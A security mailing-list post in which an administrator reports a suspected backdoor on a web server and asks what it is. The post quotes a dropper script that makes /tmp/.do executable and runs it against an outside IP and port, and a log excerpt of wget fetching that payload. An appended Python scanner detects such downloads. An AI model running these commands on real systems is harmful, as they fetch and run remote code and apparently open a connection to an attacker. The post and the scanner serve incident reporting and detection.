
[suse-security] Backdoor over http(s)??



Hi all,

I have found something under /tmp:

.do
.do.sh -->
----
chmod 755 /tmp/.do
/tmp/.do 163.17.51.8 9090
-----

ls -l shows:
wwwrun nogroup
----

I have found in /var/log/httpd/error.log

--09:06:43--  http://218.234.171.84/manual/.x/rhs
           => `/tmp/.do'
Resolving 218.234.171.84... done.
Connecting to 218.234.171.84:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 435,444 [text/plain]

    0K .......... .......... .......... .......... .......... 11%   44.21 KB/s
   50K .......... .......... .......... .......... .......... 23%  131.93 KB/s
  100K .......... .......... .......... .......... .......... 35%  123.76 KB/s
  150K .......... .......... .......... .......... .......... 47%  153.37 KB/s
  200K .......... .......... .......... .......... .......... 58%  137.36 KB/s
  250K .......... .......... .......... .......... .......... 70%  150.15 KB/s
  300K .......... .......... .......... .......... .......... 82%  373.13 KB/s
  350K .......... .......... .......... .......... .......... 94%  144.09 KB/s
  400K .......... .......... .....                           100%   90.46 KB/s

09:06:47 (115.02 KB/s) - `/tmp/.do' saved [435444/435444]

connect error
-----
What's that?
chkroot shows nothing,
tripwire -"-
???

Regards
Tibor
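
An added example, not part of the original post: a small Python scanner that pulls wget transfer transcripts in the format quoted above out of a web server error log and flags files saved as hidden names under world-writable directories. The `WRITABLE` watch list, the function name and the first sample line are assumptions made for illustration; the rest of the sample is modelled on the excerpt in the post.

```python
import re

# Transcript header in the format quoted in the post: "--HH:MM:SS--  URL"
REQ = re.compile(r"^--(\d{2}:\d{2}:\d{2})--\s+(\S+)")
# Completion line: "HH:MM:SS (rate) - `path' saved [got/total]"
SAVED = re.compile(r"^\d{2}:\d{2}:\d{2} \(.*?\) - [`'](.+?)' saved \[(\d+)/(\d+)\]")
WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")  # assumed watch list


def find_downloads(lines):
    """Return one dict per completed wget transfer found in the log lines."""
    hits, pending = [], None
    for line in lines:
        m = REQ.match(line)
        if m:
            # Start of a new transcript; remember when and what was requested
            pending = {"time": m.group(1), "url": m.group(2)}
            continue
        m = SAVED.match(line)
        if m and pending:
            path = m.group(1)
            name = path.rsplit("/", 1)[-1]
            pending.update(
                path=path,
                size=int(m.group(2)),
                # Hidden file dropped into a world-writable directory
                suspicious=path.startswith(WRITABLE) and name.startswith("."),
            )
            hits.append(pending)
            pending = None
    return hits


# Constructed sample: first line invented, remainder modelled on the post's
# excerpt with the progress lines omitted
SAMPLE = """\
[error] File does not exist: /srv/www/htdocs/favicon.ico
--09:06:43--  http://218.234.171.84/manual/.x/rhs
           => `/tmp/.do'
Connecting to 218.234.171.84:80... connected.
HTTP request sent, awaiting response... 200 OK
09:06:47 (115.02 KB/s) - `/tmp/.do' saved [435444/435444]
connect error
""".splitlines()

if __name__ == "__main__":
    for hit in find_downloads(SAMPLE):
        flag = "SUSPICIOUS" if hit["suspicious"] else "review"
        print(f'{flag}: {hit["time"]} {hit["url"]} -> {hit["path"]} ({hit["size"]} bytes)')
```

Any transcript of this kind in the error log is worth reviewing, since it means a process whose output goes to that log ran a download; the flag only ranks which ones to look at first.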
